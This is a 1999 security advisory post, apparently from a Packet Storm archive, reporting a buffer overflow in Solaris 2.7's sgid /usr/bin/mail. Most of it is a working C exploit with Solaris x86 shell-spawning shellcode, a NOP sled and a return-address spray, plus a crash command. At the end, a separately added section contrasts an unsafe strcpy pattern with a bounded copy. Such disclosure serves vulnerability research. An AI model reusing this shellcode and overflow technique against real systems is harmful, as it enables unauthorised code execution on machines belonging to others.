
solaris_bof.txt

19 Sep 1999, reported by Packet Storm (packetstormsecurity.com)

Possible buffer overflow in Solaris 2.7 /usr/bin/mail; the post demonstrates command execution through the overflow.

Subject: Solaris 2.7 /usr/bin/mail
To: [email protected]   
  
  
Greetings,  
  
  
There is a possible buffer overflow vulnerability in Solaris 2.7's sgid mail /usr/bin/mail. The reason it's only a possibility and not a full-blown exploit is that mail drops sgid privs before the overflow occurs. However, as we've seen in several past posts, this is not necessarily a bulletproof method of making one's program secure. Obviously mail needs these privs to perform some function, probably opening the appropriate mail-owned files to deliver mail. My guess would be that in the following usage, mail would need write (read?) access to foo's mail file.
  
  
```
bash-2.02$ mail -m `perl -e "print 'A' x 2106"` foo
.
mail: ERROR signal 11
bash-2.02$
```
  
  
In any case, this overflow does allow execution of any command you wish, as shown in the program at the end of this message. I would imagine that with some careful asm code, one would be able to exploit the specific vulnerability that may exist. Information on exactly what mail does with its s bit would be helpful.
  
  
Brock Tellier  
UNIX Systems Administrator  
Webley Systems  
www.webley.com  
  
  
--- solx86.c ---

```c
/*
 * Generic Solaris x86 exploit program by Brock Tellier
 * Shellcode by Cheez Whiz
 *
 *   gcc -o mailex solx86.c
 *   /usr/bin/mail -m `./mailex 0 1985 2285` foo
 *   . <period, enter>
 *   $ <not a rootshell ;)>
 *
 * Usage: ./mailex <offset> <NOPS> <BUFSIZE>
 *
 * Demonstrative program for mail vulnerability. mail apparently drops
 * privs before the overflow occurs so we're not going to have a sgid mail
 * shell. Perhaps someone could make some 'shellcode' to exploit an open file
 * descriptor or something (whatever the reason mail is sgid mail).
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF 10000
#define NOP 0x90

/* Solaris x86 shellcode by Cheez Whiz, unchanged from the post */
char shell[] =
    "\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff"
    "\xc3\x5e\x31\xc0\x89\x46\xc1\x88\x46"
    "\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0"
    "\x50\xb0\x17\xe8\xdf\xff\xff\xff\x83"
    "\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53"
    "\x8d\x1e\x89\x5e\x08\x53\xb0\x3b\xe8"
    "\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8"
    "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff";

unsigned long int nop;      /* length of the leading NOP sled */
unsigned long int esp;      /* stack pointer sampled from this process */
long int offset;            /* added to esp to form the guessed return address */

char buf[BUF];

/* Leaves %esp in %eax, the return register on 32-bit x86; this trick
 * only behaves as intended on that ABI. */
unsigned long int get_esp()
{
    __asm__("movl %esp,%eax");
}

int
main (int argc, char *argv[])
{
    int buflen, i;

    if (argc > 1)
        offset = strtol(argv[1], NULL, 0);

    if (argc > 2)
        nop = strtoul(argv[2], NULL, 0);
    else
        nop = 285;

    if (argc > 3)
        buflen = atoi(argv[3]);
    else
        buflen = BUF;

    /* keep one byte free for a terminator so strlen(buf) below stays inside the array */
    if (buflen < 1 || buflen >= BUF)
        buflen = BUF - 1;
    if (nop + strlen(shell) + 4 > (unsigned long) buflen) {
        fprintf(stderr, "NOPS + shellcode do not fit in BUFSIZE\n");
        return 1;
    }

    esp = get_esp();

    /* layout: NOP sled, shellcode, then the guessed return address repeated to the end */
    memset(buf, NOP, buflen);
    memcpy(buf + nop, shell, strlen(shell));
    for (i = nop + strlen(shell); i < buflen - 4; i += 4)
        *((int *) &buf[i]) = esp + offset;
    buf[buflen] = '\0';

    for (i = 0; i < strlen(buf); i++)
        putchar(buf[i]);

    return 0;
}
```
---
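The pattern behind a crash like the 2106-byte `-m` argument above, as an added example that is neither the post's code nor Solaris mail's source: a hypothetical unbounded copy of the argument into a fixed stack buffer, beside a bounded copy that rejects over-long input instead of overrunning. `SUBJECT_MAX` and both function names are assumptions, since the real buffer size in mail is not on the page.

```c
/* Added example, not from the advisory or from mail(1). */
#include <stdio.h>
#include <string.h>
#include <errno.h>

#define SUBJECT_MAX 2048   /* assumed size; mail's real buffer size is not on the page */

/* Hypothetical unsafe pattern: strcpy into a fixed stack buffer with no length
 * check. An argument longer than the buffer overwrites the saved frame, which
 * is how an over-long -m value ends in "signal 11". Only safe for short input. */
int subject_copy_unsafe(const char *arg)
{
    char subject[SUBJECT_MAX];
    strcpy(subject, arg);
    return (int) strlen(subject);
}

/* Bounded version: look for the terminator only within outsz bytes, refuse
 * input that does not fit, copy exactly n bytes and always NUL-terminate.
 * Returns 0 on success, -1 with errno = E2BIG when the argument is too long. */
int subject_copy_bounded(const char *arg, char *out, size_t outsz)
{
    const char *end;
    size_t n;

    if (outsz == 0)
        goto too_long;
    end = memchr(arg, '\0', outsz);   /* NULL: no terminator inside the limit */
    if (end == NULL)
        goto too_long;
    n = (size_t) (end - arg);          /* n <= outsz - 1, so out[n] is in range */
    memcpy(out, arg, n);
    out[n] = '\0';
    return 0;

too_long:
    errno = E2BIG;
    return -1;
}

int main(int argc, char *argv[])
{
    char subject[SUBJECT_MAX];
    const char *arg = argc > 1 ? argv[1] : "constructed short subject";

    if (subject_copy_bounded(arg, subject, sizeof subject) != 0) {
        fprintf(stderr, "subject too long (max %d bytes)\n", SUBJECT_MAX - 1);
        return 1;
    }
    printf("subject: %s\n", subject);
    return 0;
}
```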
